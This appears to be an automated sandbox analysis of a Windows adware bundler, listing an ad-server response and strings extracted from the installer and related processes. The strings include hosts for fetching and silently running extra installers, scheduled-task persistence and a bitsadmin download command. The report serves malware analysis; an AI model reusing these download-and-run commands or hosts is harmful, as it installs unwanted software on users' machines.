Set-Cookie: epomUUID=b4aedbf0-4b1e-11e7-bbde-9c8e991fef80; Domain=.VVV.1-1ads.com; Expires=Fri, 07-Jun-2019 01:14:51 GMT; Path=/

Set-Cookie: cfc=10001-1496815371060--; Domain=.VVV.1-1ads.com; Expires=Thu, 07-Jun-2018 01:14:51 GMT; Path=/

Content-Type: text/javascript;charset=UTF-8

Content-Length: 4078

Date: Wed, 07 Jun 2017 01:14:50 GMT

Connection: close
(function(){.var tid = document.getElementById("3a71f57f6d976f956c5f61
dbdd4adf7b_sync");.tid.innerHTML = "<script type=\"text\/javascript
\">new Image().src = \"http:\/\/VVV.1-1ads.com\" \"\/im\" \"pressi\
" \"on.gif?b=118203\" \"&p=5103&ch=&ad.trans.id=ammxbq72zzmp&ap=&wp=&c
ps=&c\" \"=10001&l=UA\" \"&h=8f136e40c877dac2422c2d2be7acf039&t=149679
8091061&s=e0edce0204b209db8a0c76b02a2aefea&tz=3.0&sh=902&sw=1916&o=\";
<\/script><script type=\"text\/javascript\">\n    var Cust
omWLAdServer = CustomWLAdServer || [];\n    CustomWLAdServer.status = 
null;\n    CustomWLAdServer.bUrl = null;\n    CustomWLAdServer.bUrlTop
 = false;\n    CustomWLAdServer.imgSrc = null;\n    CustomWLAdServer.a
cbs = [];\n    CustomWLAdServer.goBUrl = function () {if(CustomWLAdSer
ver.bUrlTop)top.location.href=CustomWLAdServer.bUrl; else self.locatio
n.href=CustomWLAdServer.bUrl;};\n    CustomWLAdServer.loadImg = functi
on () {new Image().src = CustomWLAdServer.imgSrc;CustomWLAdServer.show
Beacons(CustomWLAdServer.acbs);CustomWLAdServer.clearStatus();};\n    
CustomWLAdServer.clearStatus = function () {CustomWLAdServer.status = 
null;CustomWLAdServer.imgSrc = null;CustomWLAdServer.acbs = [];};\n   
 CustomWLAdServer.showBeacons = function (acbs) {for(var i=0;i<acbs
.length;i  ){new Image().src = acbs[i];}};\n    CustomWLAdServer.mouse
Down = function () {if (CustomWLAdServer.status == \"mouseOver\") {Cus
tomWLAdServer.status = \"mouseDown\";} else {CustomWLAdServer.clearSta
tus();}};\n    CustomWLAdServer.click = function (d, b, p, ch, txi
<<< skipped >>>

The Application connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

Gw2.Hw

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

"C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\Setup__21223_il2.exe"

.1.5.26&monitor=1&z2=0&ci=21223&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsz9280.tmp\NSISdl.dll

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsz9280.tmp

.reloc

WS2_32.dll

NSISdl.dll

invalid URL

Host: %s

GET %s HTTP/1.0

User-Agent: NSISDL/1.2 (Mozilla)

http=

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Unable to open %s

%skB (%d%%) of %skB at %u.
ukB/s

(%u hours remaining)

(%u minutes remaining)

(%u seconds remaining)

Downloading %s

.vN {

({,{<{*;

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\\sevensetup.exe

sevensetup.exe

SEVENS~1.EXE

5.26&monitor=1&z2=0&ci=21223&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

sers\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt

ersion=1.1.5.26&monitor=1&z2=0&ci=21223&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

p__21223_il2.exe

ile.com/xdownload.php?version=1.1.5.26&monitor=1&z2=0&ci=21223&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

"D:\run-setup.exe"

run-setup.exe

ers\"%CurrentUserName%"\AppData\Local\Temp\nsz927F.tmp

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\

D:\run-setup.exe

hXXp://VVV.bringmethefile.com/xdownload.php?version=1.1.5.26&monitor=1&z2=0&ci=21223&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

Setup__21223_il2.exe

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

iexplore.exe_940:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... )) 

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

iexplore.exe_1644:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... )) 

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

SearchProtocolHost.exe_1068:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

MSSHooks.dll

IMM32.dll

SHLWAPI.dll

SrchCollatorCatalogInfo

SrchDSSLogin

SrchDSSPortManager

SrchPHHttp

SrchIndexerQuery

SrchIndexerProperties

SrchIndexerPlugin

SrchIndexerClient

SrchIndexerSchema

Msidle.dll

Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default

pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty

d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx

d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

</MSG></TRC>

<MSG>

<ERR> 0xx=

<LOC> %s(%d) </LOC>

tid="0x%x"

pid="0x%x"

tagname="%s"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%s"

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

SHELL32.dll

PROPSYS.dll

ntdll.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

MsgWaitForMultipleObjects

SearchProtocolHost.pdb

2 2(20282|2

4%5S5

Software\Microsoft\Windows Search

https

kernel32.dll

msTracer.dll

msfte.dll

lX-X-X-XX-XXXXXX

SOFTWARE\Microsoft\Windows Search

tquery.dll

%s\%s

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>

advapi32.dll

WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll

winhttp.dll

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

<MSG>

<LOC> %S(%d) </LOC>

tagname="%S"

logname="%S"

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

Microsoft Windows Search Protocol Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchProtocolHost.exe

Windows

7.00.7601.17610

SearchFilterHost.exe_2516:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

ntdll.DLL

KERNEL32.dll

msvcrt.dll

USER32.dll

ole32.dll

OLEAUT32.dll

TQUERY.DLL

IMM32.dll

MSSHooks.dll

mscoree.dll

SHLWAPI.dll

d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp

RegDeleteKeyW

RegDeleteKeyExW

8%uiP

d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx

Invalid parameter passed to C runtime function.

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp

-d-d-d-d-d-d-d-%d

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h

d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ReportEventW

_amsg_exit

SearchFilterHost.pdb

version="5.1.0.0"

name="Microsoft.Windows.Search.MSSFH"

<requestedExecutionLevel

3 3(30383|3

kernel32.dll

Software\Microsoft\Windows Search

SOFTWARE\Microsoft\Windows Search

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

Windows Search Service

tquery.dll

advapi32.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>

Software\Microsoft\Windows Search\Tracing

Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported

Software\Microsoft\Windows Search\Tracing\EventThrottleState

<MSG>

<ERR> 0xx=

<LOC> %S(%d) </LOC>

tid="0x%x"

pid="0x%x"

tagname="%S"

tagid="0x%x"

el="0x%x"

time="d/d/d d:d:d.d"

logname="%S"

</MSG></TRC>

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

%s\%s

winhttp.dll

Microsoft Windows Search Filter Host

7.00.7601.17610 (win7sp1_gdr.110503-1502)

SearchFilterHost.exe

Windows

7.00.7601.17610

Setup__21223_il2.exe_2108:

.text

`.rdata

@.data

.rsrc

@.reloc

j5SSh

.hx?G

xSSSh

FTPjKS

FtPj;S

C.PjRV

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

GetProcessWindowStation

WinHttpSetStatusCallback

Sending request %S

%S - transfer terminated

Error %d transferring %S

Status code %d returned from %S

Trying to redirect from %S to %S

AsyncWinHttp added contentLength %d to s_nTotalBytes2Download %d

Query Data: Error %d encountered (%S)

Read Data: Error %d encountered (%S)

AsyncWinHttp::AsyncCallback WINHTTP_CALLBACK_STATUS_DATA_AVAILABLE download error update total sizes.

WinHttpGetIEProxyConfigForCurrentUser

CBoot::OnShowTrayNotification(UM_USERSHOWNOTIFY %d, %d )

CBoot::OnTimer: end installation timer to %d minutes elapsed. Send ThankYou and close.

CBoot::OnUserMsgPercept(%d, %d, %d )

CBoot::OnUserMsgShowInit(UM_USERSHOWINIT %d, %d )

CBoot::OnInitDialog: query = %S

CBoot::OnInitDialog, next monetization file exists: %ls, delete it with result %d

CBoot::RemoveFromCompList(name=%S)

CBoot::AddToCompList(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld)

CBoot::AsyncStartDownloadAndInstall(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld)

CBoot::AsyncStartDownloadAndInstall set end installation timer to %d minutes

CBoot::AsyncStartDownloadAndInstall3(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld, rate=%lf)

CBoot::AsyncStartDownloadAndInstall2(shortName=%S, url=%S, url2=%S,launchCommandLine=%S, launchedProcessName=%S, installMode=%ld)

CBoot::AsyncStartDownloadAndInstall2 set end installation timer to %d minutes

CBoot::AsyncStartDownload2(shortName=%S, url=%S, url2=%S)

CBoot::EnableInstallation(%d, %S, %S, %d)

CBoot::RequestExit(%d)

10u page URL: %S post data %S

Resume link created at: '%S'

DestroyIcon: %S

DestroyIcon: File '%S' deleted

DestroyIcon: Fail to delete file '%S' code %d

SHFileOperationW

DestroyIcon: SHFileOperationW rc=%d

CBoot::ShowMe doShow=%d

WriteRegistryInt - returned %d

Failed to create upd object 0X%X

CBoot::RunResource %S %S

CBoot::SetThanksParameter: thankParams[%S] = %S

CBoot::CreateDownloadScheduleTask: %S '%S' '%S' %ld

Failed to get the Temp folder: %d

Boot::CreateDownloadScheduleTask: Failed to create a download task for %S

CBoot::CreateDownloadScheduleTask: Failed to create an install task for %S

CBoot::CreateDownloadScheduleTask: Failed to create a download task for %S

CBoot::CreateDeleteScheduleTask: Failed to create a delete task for %S

CBoot::CreateDownloadScheduleTask: Download and install tasks were created for %S

CBoot::UpdateProgress %S %ld %S %ld %ld

CBoot::UpdateProgress Create new progreess request for %S

CBoot::UpdateProgress Failed to create a new progreess request for %S

ShellExecuteExW

Term. wait %d

Fatal error X initializing UI

Term.thread created %d

Main thread %d ended %d

CDownload::CDownload Resource for %S loaded

CDownload::CDownload Resource for %S written to %S

CDownload::CDownload Resource for %S set installExe %S

Failed to run %S - component skipped

CDownload::ReadyToInstall %S

Failed to run %S - unsupported type %d

CDownload::EnableInstallation(%S, %S, %d)

CDownload::EnableInstallation return %s

CDownload::Install started m_id=%d shortName=%S

CDownload::Install Failed to delete file %S , error %d

CDownload::Install Error on CreateDirectory %S , error %d

CDownload::Install Change file name %S

CDownload::Install Failed to move temp file '%S' to %S , error %d

CDownload::Install DownloadType=%d

%S Running for %S: '%S' '%S'

CDownload::Install Trying to open folder (%S) containing zip , error %d

CDownload::Install Failed to run (%S) , error %d

%S BEFORE activating Wait4TreeThread %d %d

%S ACTIVATING Wait4TreeThread %d %d

%S AFTER activating Wait4TreeThread %d %d nCount %d

CDownload::Install %S wait %ld milliseconds before set status to dst_InstallProcessEnded

CDownload::Install %S wait %ld milliseconds before set status to dst_InstallProcessTreeEnded

CDownload::Install Child process for %S (id %d) ended, RC=%d, status=%d

Wait 4 3 skipped for %S

CDownload::Install Ended for m_id=%d shortName=%S

Process 3 for %S (id %d) empty

Timeout waiting for process 3 %S (id %d)

Process tree for %S ended

Looking for processes tree of %d: parents size %d, pending size %d

%S running, wait for %S ended

3 for %d: parents size %d, pending size %d rc=%d

CDownload::SetState for '%S' is %d

CDownload::AddThanksParameter p=%S v=%d

HtmlDialog::GetIDsOfNames(NOT IMPLEMENTED %S)

JsLog: %S

CInstallationManager::IntOnDownloadCompleted: Download id=%d ShortName=%S

CInstallationManager::IntOnDownloadCompleted Id %d download ended OK

CInstallationManager::IntOnDownloadCompleted Id %d assigned to %S, retry state %d

CInstallationManager::IntOnDownloadCompleted Status=%d for component_id=%d, error=%d

CInstallationManager::EnqueueInstallation ReadyToInstall %S

CInstallationManager::EnqueueInstallation Error on ReadyToInstall %S

CInstallationManager::Download(%S, %S, %S)

CInstallationManager::Install(%d, %S, %S,%d)

CInstallationManager::IntDownload(%S, %S, %S,%d)

CInstallationManager::IntDownload Id %d assigned to %S, state=%d

CInstallationManager::IntDownload Id %d assigned to %S, state=%d(retry)

CInstallationManager::IntDownload state == dst_DownloadEndedError s_hTotalDownloadErrors=%d

CInstallationManager::IntDownload s_hTotalDownloadErrors %d

CInstallationManager::IntDownload: Adding CDownload for %S to m_downloads)

CInstallationManager::IntInstall(id=%d, installCmdLine=%S, ProcessName=%S, installMode=%d)

%d postponed runs released

CInstallationManager::IntReleasePostponed Add %S to the end of the list

ReleasePostponed %S

CInstallationManager::RemovePossibleComponents %S removed from list

CInstallationManager::IsPartOfInstallation value=%s

CInstallationManager::SetComponentInstallationEnded %S

%Y-%m-%d %H:%M:%S

CProgressUpdateRequest::CreateInstance %S

CProgressUpdateRequest::ProgressUpdate %S

Send progress update request %s

Progress Request for '%S' return %s

Temp file %S moved to %S, success %d

Key %X/%S opened, error %d

Value %S written, error %d

RegCreateKeyTransactedW

RegOpenKeyExA

RegCloseKey

SOFTWARE\Microsoft\Windows NT\CurrentVersion

RegOpenKeyTransactedW

CTaskScheduleHandler::CreateNewTask Failed to create an instance of ITaskService: %x

CTaskScheduleHandler::CreateNewTask ITaskService::Connect failed: %x

CTaskScheduleHandler::CreateNewTask Cannot get Root folder pointer: %x

CTaskScheduleHandler::CreateNewTask Failed to CoCreate an instance of the TaskService class: %x

CTaskScheduleHandler::CreateNewTask Cannot get identification pointer: %x

CTaskScheduleHandler::CreateNewTask Cannot put identification info: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot get principal pointer: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot put RunLevel principal info: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot put LogonType principal info: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot get settings pointer: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot put setting hidden information: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot put setting information: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot get idle setting information: %x

CTaskScheduleHandler::SetSecurityCredentials Cannot put idle setting information: %x

CTaskScheduleHandler::CreateTaskTrigger Cannot get trigger collection: %x

CTaskScheduleHandler::CreateTaskTrigger Cannot create trigger: %x

CTaskScheduleHandler::CreateTaskTrigger QueryInterface call failed for ITimeTrigger: %x

CTaskScheduleHandler::CreateTaskTrigger Cannot put trigger ID: %x

CTaskScheduleHandler::CreateTaskTrigger Cannot put end boundary on trigger: %x

CTaskScheduleHandler::CreateTaskTrigger Cannot add start boundary to trigger: %x

CTaskScheduleHandler::SaveTask Error saving the Task: %x

CTaskScheduleHandler::SaveTask Cannot get Task collection pointer: %x

CTaskScheduleHandler::SaveTask Cannot create the action: %x

CTaskScheduleHandler::SaveTask QueryInterface call failed for IExecAction: %x

CTaskScheduleHandler::SaveTask Cannot put action path: %x

CTaskScheduleHandler::SaveTask Cannot put action arguments: %x

CTaskScheduleHandler::CreateDownloadTask Cannot create a new task: %x

CTaskScheduleHandler::CreateDownloadTask Fail to add registration info: %x

CTaskScheduleHandler::CreateDownloadTask Fail to add security credentials: %x

CTaskScheduleHandler::CreateDownloadTask Failed to create an instance of ITaskService: %x

CTaskScheduleHandler::CreateDownloadTask Fail to add trigger: %x

CTaskScheduleHandler::CreateDownloadTask Cannot create the download action: %x

CTaskScheduleHandler::CreateDownloadTask Fail to save the task: %x

CTaskScheduleHandler::CreateInstallTask Cannot create a new task: %x

CTaskScheduleHandler::CreateInstallTask Fail to add registration info: %x

CTaskScheduleHandler::CreateInstallTask Fail to add security credentials: %x

CTaskScheduleHandler::CreateInstallTask Fail to add settings: %x

CTaskScheduleHandler::CreateInstallTask Fail to add trigger: %x

CTaskScheduleHandler::CreateInstallTask Cannot create the execute action: %x

CTaskScheduleHandler::CreateInstallTask Cannot create the delete action: %x

CTaskScheduleHandler::CreateInstallTask Fail to save the task: %x

"'\?<>&= %,/:!#$;[]()

Process=%S command=%S verb=%S, result=%d

%c%c%c%c

C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb

VERSION.dll

KERNEL32.dll

USER32.dll

GDI32.dll

RegCreateKeyExW

RegOpenKeyExW

RegEnumKeyW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

Secur32.dll

WinHttpCloseHandle

WinHttpOpen

WinHttpSetOption

WinHttpGetProxyForUrl

WinHttpCrackUrl

WinHttpConnect

WinHttpOpenRequest

WinHttpSetStatusCallback

WinHttpSendRequest

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpReceiveResponse

WINHTTP.dll

GetProcessHeap

GetCPInfo

zcÁ

.?AVAsyncWinHttp@@

.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AUDWebBrowserEvents2@@

.?AUISupportErrorInfo@@

.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@

?456789:;<=

!"#$%&'()* ,-./0123

.sssh

REÚ

\.crr

s1f-'

.DC l

tweb

<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />

9%9s9

:(:2:8:\:

4,4}4'5.5

5!5'565?5

5'5/555<5

=&=.=6=\=

7 7@7`7|7

= =<=@=`=

GetWindowsDirectoryA

GetWindowsDirectoryW

GetConsoleOutputCP

<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

wKERNEL32.DLL

ADVAPI32.DLL

WUSER32.DLL

Winhttp.dll

Content-Type: application/x-www-form-urlencoded

shlwapi.dll

Dole32.dll

WContent-Type: application/x-www-form-urlencoded

hXXp://VVV.%s/index.php

ficbetaglucose.site

appimageurl

InternetExplorer.Application

cmdl

Network error (%d) encountered, install aborted

debug.html

capp=%s&cid=%s&mhx=%S&base=%s

\bitsadmin.exe

W\Support Tools\bitsadmin.exe

:?*\"'/.

:Zone.Identifier

%s\%s.lnk

%s\*%s*.lnk

%samipixel.cfg

%sami*.tmp.ico

%s%s*.exe

dream.capture

%sami%s%d%d.exe

%d-%.2d-%.2dT%.2d:%.2d:00

%d-%.2d-%.2dT%.2d:-:00

c[%s][%s]

/retrynav %d

shell32.dll

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

%TEMP%\amilog.txt

&You are about to exit the installation. Click OK to Exit and install %s including other optional programs.

&Resume installation on next Windows startup

.exe.msi.zip.xap.bat

%Windir%\System32\msiexec.exe

/i "%s"

%ProgramFiles%\Microsoft Silverlight\sllauncher.exe

%ProgramW6432%\Microsoft Silverlight\sllauncher.exe

/install:"%s" /origin:%s

kernel32.dll

CheckRegKey

BestReaderCheckRegKey

IsShortNameInstalled

sn=%s&hx=%S&base=%s

rfsw%d

BAdvapi32.dll

advapi32.dll

Iphlpapi.dll

SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\%S\Connection

v2.0.50727

v1.1.4322

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

NT%d.%dSP%d

%ProgramFiles%\Mozilla Firefox\firefox.exe

%localappdata%\Google\Chrome\Application\chrome.exe

%ProgramFiles%\Google\Chrome\Application\chrome.exe

%d.%d.%d.%d

ami%sExd

bitsadmin /transfer amijob /download /priority high %s %s

